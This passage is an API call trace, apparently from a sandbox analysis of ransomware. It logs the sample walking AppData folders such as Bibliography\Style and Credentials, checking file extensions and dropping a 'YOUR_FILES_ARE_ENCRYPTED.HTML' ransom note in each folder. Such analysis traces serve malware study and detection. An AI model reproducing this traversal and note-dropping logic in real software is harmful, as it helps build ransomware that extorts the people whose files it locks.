ftLastWriteTime.dwLowDateTime=0x80e9aa3d, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.919] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e9aa3d, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e9aa3d, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80e9aa3d, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="Style", cAlternateFileName="")) returned 1 [0122.919] StrStrIW (lpFirst="Style", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.919] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style") returned 70 [0122.919] GetProcessHeap () returned 0x600000 [0122.919] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0122.932] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style" [0122.932] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\*" [0122.932] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e9aa3d, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e9aa3d, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80ed2ca5, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0122.936] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e9aa3d, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e9aa3d, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80ed2ca5, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="..", cAlternateFileName="")) returned 1 [0122.937] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80e9e60e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e9e60e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5a58ff51, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x51722, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="APASixthEditionOfficeOnline.xsl", cAlternateFileName="APASIX~1.XSL")) returned 1 [0122.937] StrStrIW (lpFirst="APASixthEditionOfficeOnline.xsl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.937] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl") returned 102 [0122.937] PathFindExtensionW (pszPath="APASixthEditionOfficeOnline.xsl") returned=".xsl" [0122.937] lstrlenW (lpString=".xsl") returned 4 [0122.937] PathFindExtensionW (pszPath="APASixthEditionOfficeOnline.xsl") returned=".xsl" [0122.937] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ea6d97, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ea6d97, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5a638a82, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x48839, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="CHICAGO.XSL", cAlternateFileName="")) returned 1 [0122.937] StrStrIW (lpFirst="CHICAGO.XSL", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.937] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL") returned 82 [0122.937] PathFindExtensionW (pszPath="CHICAGO.XSL") returned=".XSL" [0122.937] lstrlenW (lpString=".XSL") returned 4 [0122.937] PathFindExtensionW (pszPath="CHICAGO.XSL") returned=".XSL" [0122.937] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80eabbab, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80eabbab, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5a6d16e8, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x4197e, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="GB.XSL", cAlternateFileName="")) returned 1 [0122.937] StrStrIW (lpFirst="GB.XSL", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.937] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL") returned 77 [0122.937] PathFindExtensionW (pszPath="GB.XSL") returned=".XSL" [0122.937] lstrlenW (lpString=".XSL") returned 4 [0122.937] PathFindExtensionW (pszPath="GB.XSL") returned=".XSL" [0122.937] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80eaf650, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80eaf650, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5a638a82, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x3e966, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="GostName.XSL", cAlternateFileName="")) returned 1 [0122.937] StrStrIW (lpFirst="GostName.XSL", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.937] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL") returned 83 [0122.937] PathFindExtensionW (pszPath="GostName.XSL") returned=".XSL" [0122.937] lstrlenW (lpString=".XSL") returned 4 [0122.937] PathFindExtensionW (pszPath="GostName.XSL") returned=".XSL" [0122.937] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80eb319b, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80eb319b, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5a638a82, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x3d639, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="GostTitle.XSL", cAlternateFileName="GOSTTI~1.XSL")) returned 1 [0122.937] StrStrIW (lpFirst="GostTitle.XSL", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.938] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL") returned 84 [0122.938] PathFindExtensionW (pszPath="GostTitle.XSL") returned=".XSL" [0122.938] lstrlenW (lpString=".XSL") returned 4 [0122.938] PathFindExtensionW (pszPath="GostTitle.XSL") returned=".XSL" [0122.938] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80eb804f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80eb804f, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5a7ecfbc, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x45882, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="HarvardAnglia2008OfficeOnline.xsl", cAlternateFileName="HARVAR~1.XSL")) returned 1 [0122.938] StrStrIW (lpFirst="HarvardAnglia2008OfficeOnline.xsl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.938] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl") returned 104 [0122.938] PathFindExtensionW (pszPath="HarvardAnglia2008OfficeOnline.xsl") returned=".xsl" [0122.938] lstrlenW (lpString=".xsl") returned 4 [0122.938] PathFindExtensionW (pszPath="HarvardAnglia2008OfficeOnline.xsl") returned=".xsl" [0122.938] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ebb9a1, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ebb9a1, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5afed704, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x47e7d, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="IEEE2006OfficeOnline.xsl", cAlternateFileName="IEEE20~1.XSL")) returned 1 [0122.938] StrStrIW (lpFirst="IEEE2006OfficeOnline.xsl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.938] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl") returned 95 [0122.938] PathFindExtensionW (pszPath="IEEE2006OfficeOnline.xsl") returned=".xsl" [0122.938] lstrlenW (lpString=".xsl") returned 4 [0122.938] PathFindExtensionW (pszPath="IEEE2006OfficeOnline.xsl") returned=".xsl" [0122.938] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ec07b6, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ec07b6, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5afed704, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x42132, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="ISO690.XSL", cAlternateFileName="")) returned 1 [0122.938] StrStrIW (lpFirst="ISO690.XSL", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.938] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL") returned 81 [0122.938] PathFindExtensionW (pszPath="ISO690.XSL") returned=".XSL" [0122.938] lstrlenW (lpString=".XSL") returned 4 [0122.938] PathFindExtensionW (pszPath="ISO690.XSL") returned=".XSL" [0122.938] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ec4265, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ec4265, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5afed704, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x351ea, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="ISO690Nmerical.XSL", cAlternateFileName="ISO690~1.XSL")) returned 1 [0122.938] StrStrIW (lpFirst="ISO690Nmerical.XSL", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.938] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL") returned 89 [0122.938] PathFindExtensionW (pszPath="ISO690Nmerical.XSL") returned=".XSL" [0122.939] lstrlenW (lpString=".XSL") returned 4 [0122.939] PathFindExtensionW (pszPath="ISO690Nmerical.XSL") returned=".XSL" [0122.939] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ecb8b4, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ecb8b4, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5afed704, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x3e4f3, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="MLASeventhEditionOfficeOnline.xsl", cAlternateFileName="MLASEV~1.XSL")) returned 1 [0122.939] StrStrIW (lpFirst="MLASeventhEditionOfficeOnline.xsl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.939] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl") returned 104 [0122.939] PathFindExtensionW (pszPath="MLASeventhEditionOfficeOnline.xsl") returned=".xsl" [0122.939] lstrlenW (lpString=".xsl") returned 4 [0122.939] PathFindExtensionW (pszPath="MLASeventhEditionOfficeOnline.xsl") returned=".xsl" [0122.939] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ed06d2, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ed06d2, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5b432832, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x3d5c8, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="SIST02.XSL", cAlternateFileName="")) returned 1 [0122.939] StrStrIW (lpFirst="SIST02.XSL", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.939] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL") returned 81 [0122.939] PathFindExtensionW (pszPath="SIST02.XSL") returned=".XSL" [0122.939] lstrlenW (lpString=".XSL") returned 4 [0122.939] PathFindExtensionW (pszPath="SIST02.XSL") returned=".XSL" [0122.939] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ed2ca5, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ed2ca5, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5b500917, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x54256, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="TURABIAN.XSL", cAlternateFileName="")) returned 1 [0122.939] StrStrIW (lpFirst="TURABIAN.XSL", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.939] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL") returned 83 [0122.939] PathFindExtensionW (pszPath="TURABIAN.XSL") returned=".XSL" [0122.939] lstrlenW (lpString=".XSL") returned 4 [0122.939] PathFindExtensionW (pszPath="TURABIAN.XSL") returned=".XSL" [0122.939] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ed2ca5, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ed2ca5, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5b500917, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x54256, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="TURABIAN.XSL", cAlternateFileName="")) returned 0 [0122.939] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0122.940] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 100 [0122.940] GetProcessHeap () returned 0x600000 [0122.940] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0122.941] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\bibliography\\style\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0122.943] WriteFile (in: hFile=0x324, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0122.944] CloseHandle (hObject=0x324) returned 1 [0122.944] GetProcessHeap () returned 0x600000 [0122.944] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0122.945] GetProcessHeap () returned 0x600000 [0122.945] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0122.945] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e9aa3d, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e9aa3d, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80e9aa3d, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="Style", cAlternateFileName="")) returned 0 [0122.945] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0122.945] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 94 [0122.945] GetProcessHeap () returned 0x600000 [0122.945] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0122.946] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\bibliography\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0122.947] WriteFile (in: hFile=0x308, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0122.948] CloseHandle (hObject=0x308) returned 1 [0122.948] GetProcessHeap () returned 0x600000 [0122.948] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0122.948] GetProcessHeap () returned 0x600000 [0122.948] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0122.949] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0xff6176b4, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0122.949] StrStrIW (lpFirst="Credentials", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.949] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials") returned 63 [0122.950] GetProcessHeap () returned 0x600000 [0122.950] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0122.951] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials" [0122.951] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials\\*" [0122.951] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0122.951] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.951] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0122.951] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0122.951] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 93 [0122.951] GetProcessHeap () returned 0x600000 [0122.951] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0122.952] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\credentials\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0122.953] WriteFile (in: hFile=0x308, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0122.954] CloseHandle (hObject=0x308) returned 1 [0122.955] GetProcessHeap () returned 0x600000 [0122.955] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0122.955] GetProcessHeap () returned 0x600000 [0122.955] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0122.955] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, 